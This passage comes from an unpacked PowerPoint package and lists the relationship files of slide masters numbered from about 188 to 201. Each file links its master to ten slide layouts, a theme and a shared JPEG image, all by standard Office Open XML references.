Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1872.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme188.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1880.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1871.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster189.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1889.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1888.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1887.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1886.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1885.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1884.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1883.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1882.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme189.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1890.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1881.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster19.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout189.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout188.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout187.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout186.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout185.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout184.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout183.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout182.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout190.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout181.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster190.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1899.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1898.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1897.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1896.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1895.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1894.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1893.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1892.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme190.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1900.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1891.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster191.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1909.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1908.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1907.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1906.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1905.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1904.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1903.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1902.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme191.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1910.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1901.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster192.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1919.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1918.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1917.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1916.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1915.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1914.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1913.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1912.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme192.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1920.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1911.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster193.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1929.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1928.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1927.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1926.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1925.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1924.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1923.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1922.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme193.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1930.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1921.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster194.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1939.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1938.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1937.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1936.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1935.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1934.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1933.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1932.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme194.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1940.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1931.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster195.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1949.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1948.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1947.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1946.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1945.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1944.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1943.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1942.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme195.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1950.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1941.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster196.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1959.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1958.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1957.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1956.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1955.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1954.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1953.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1952.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme196.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1960.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1951.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster197.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1969.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1968.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1967.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1966.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1965.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1964.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1963.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1962.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme197.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1970.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1961.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster198.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1979.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1978.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1977.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1976.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1975.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1974.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1973.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1972.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme198.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1980.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1971.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster199.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1989.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1988.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1987.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1986.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1985.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1984.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1983.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1982.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme199.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1990.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1981.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout16.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster20.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout199.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout198.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout197.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout196.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout195.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout194.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout193.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout192.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme20.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout200.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout191.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster200.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1999.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1998.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1997.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1996.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1995.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1994.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1993.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1992.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme200.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2000.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1991.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster201.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
